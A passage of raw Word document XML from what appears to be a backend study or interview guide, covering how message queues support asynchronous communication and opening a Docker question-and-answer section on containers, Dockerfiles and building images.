    </w:p>
    <w:p w14:paraId="2F9C21C5"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Message queues are a fundamental component in facilitating asynchronous communication between backend services in distributed systems. They enable services to communicate without being directly connected or dependent on each other's availability. Here’s how message queues achieve this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C845A1"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1. Decoupling of Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0523FAC6"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Message queues act as intermediaries between services, allowing them to communicate indirectly. A producer service (sender) can publish a message to the queue, and a consumer service (receiver) can process that message at a later time. This decoupling makes the system more flexible and resilient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505823C5"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In an e-commerce system, an order service might send an order confirmation message to a queue, which is later processed by an email service to send out an email confirmation to the customer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60610BFD"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2. Asynchronous Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0615D76F"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Message queues enable asynchronous communication by allowing producers to send messages to the queue without waiting for consumers to process them. The producer can continue its operations without being blocked, and the consumer can process the messages when it’s ready.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF66DBB"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A payment processing service can enqueue a payment verification request and immediately respond to the user, while the verification is processed asynchronously by another service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDC5F73"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3. Load Balancing and Scalability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07468151"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Message queues distribute the load across multiple consumers, allowing for horizontal scaling. If there is a spike in incoming messages, more consumers can be added to process the messages concurrently, ensuring that the system remains responsive under heavy load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DBBF4B"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During a sale event, multiple instances of an inventory service can be used to handle a high volume of order requests from the message queue, preventing bottlenecks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274662EF"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4. Reliability and Fault Tolerance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524E37A0"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Message queues provide reliability by ensuring that messages are delivered even if the consumer is temporarily unavailable. Messages can be persisted in the queue until they are successfully processed, reducing the risk of data loss.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB8D5EF"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If an analytics service that processes user activity data goes down, the messages remain in the queue until the service is back up and able to process them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F3FF60"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5. Event-Driven Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6998DFA3"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Message queues support event-driven architecture by enabling services to react to events as they occur. Producers can emit events to the queue, and consumers can subscribe to those events and take action accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C86149"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In a microservices architecture, when a user registers, an event is published to the queue, triggering services like email verification, account creation, and logging to respond to the event independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A48E4AB"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6. Handling Different Processing Speeds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497941F9"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In many systems, producers and consumers operate at different speeds. Message queues buffer messages, allowing the consumer to process them at its own pace. This ensures that fast producers don’t overwhelm slower consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE4BCBB"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A video encoding service might produce encoding jobs much faster than the actual encoding process. The message queue buffers these jobs, allowing the encoding service to process them as resources become available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21293285"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7. Message Prioritization and Routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4483D0F6"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Advanced message queues allow prioritization and routing of messages. High-priority messages can be processed first, or messages can be routed to specific consumers based on certain criteria.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF4537F" w14:textId="77777777" w:rsidR="00071A16" w:rsidRPr="00DA2F32" w:rsidRDefault="00071A16" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> In a customer support system, urgent issues might be prioritized over routine requests, ensuring critical tasks are addressed promptly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B33F8B8" w14:textId="77777777" w:rsidR="00071A16" w:rsidRPr="00DA2F32" w:rsidRDefault="00071A16" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Popular Message Queue Technologies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D96C8F" w14:textId="77777777" w:rsidR="00071A16" w:rsidRPr="00DA2F32" w:rsidRDefault="00071A16" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="619"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>RabbitMQ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Offers flexible routing, message persistence, and supports various messaging patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472668E4" w14:textId="77777777" w:rsidR="00071A16" w:rsidRPr="00DA2F32" w:rsidRDefault="00071A16" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="619"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Apache Kafka:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Designed for high throughput and distributed streaming of large volumes of messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2792BC7C" w14:textId="77777777" w:rsidR="00071A16" w:rsidRPr="00DA2F32" w:rsidRDefault="00071A16" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="619"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Amazon SQS:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> A fully managed message queue service that handles scaling and fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D74A1E" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="46367564" w14:textId="2854F8F0" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="183" w:name="_Toc178383365"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Docker</w:t>
      </w:r>
      <w:bookmarkEnd w:id="183"/>
    </w:p>
    <w:p w14:paraId="2029E686"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84" w:name="_Toc178383366"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1. What is Docker, and why is it used?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="184"/>
    </w:p>
    <w:p w14:paraId="027D6F30"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Docker is an open-source platform that automates the deployment, scaling, and management of applications within lightweight, portable containers. Containers package an application and its dependencies, ensuring consistency across multiple environments. Docker is used because it simplifies application deployment, enhances scalability, ensures consistent environments from development to production, and allows for better resource utilization compared to traditional virtual machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211F2303"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85" w:name="_Toc178383367"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2. How is a Docker container different from a virtual machine?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="185"/>
    </w:p>
    <w:p w14:paraId="428EE1C4"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p>
    <w:p w14:paraId="7E77E51B" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="588"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Docker Containers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589D32E5" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="588"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Share the host OS kernel, leading to smaller size and faster startup times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B65F39" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="588"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Containers are lightweight and consume fewer resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6FD3FD" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="588"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Applications run in isolated environments, but all containers share the same OS kernel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1924794A" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="588"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Virtual Machines (VMs):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274DC069" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="588"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Include a full OS, which makes them larger and slower to start.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDB3C48" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="588"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>VMs provide full isolation with their own kernel, which leads to higher resource consumption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A48294" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="588"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Each VM runs a separate OS instance on top of the host OS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F323B50"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86" w:name="_Toc178383368"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3. What is a Dockerfile, and what are its key instructions?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="186"/>
    </w:p>
    <w:p w14:paraId="151A33D9"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Dockerfile is a text file containing a series of instructions used to build a Docker image. The instructions define the environment and how the application should be configured and run inside the container. Key Dockerfile instructions include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2943BFC2" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="589"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>FROM: Specifies the base image.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27204A99" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="589"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>RUN: Executes commands in a new layer on top of the current image.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDA903F" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="589"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>COPY/ADD: Copies files/directories from the host filesystem into the container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DC915D" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="589"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CMD: Specifies the command to run when the container starts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C15369" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="589"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ENTRYPOINT: Configures a container to run as an executable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA9A695" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="589"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ENV: Sets environment variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796867E2" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="589"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>EXPOSE: Informs Docker that the container listens on a specific port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35664D6D"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87" w:name="_Toc178383369"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4. How do you build and run a Docker image?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="187"/>
    </w:p>
    <w:p w14:paraId="30B5200C"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To build a Docker image from a Dockerfile, use the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9B30D8"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bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FADA90E"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Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743B6F13"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docker build -t my-image-name .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272128CF" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="590"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-t my-image-name: Tags the image with the specified name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E275F3F" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="590"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.: Indicates the build context, usually the current directory.</w:t>
      </w:r>
    </w:p>
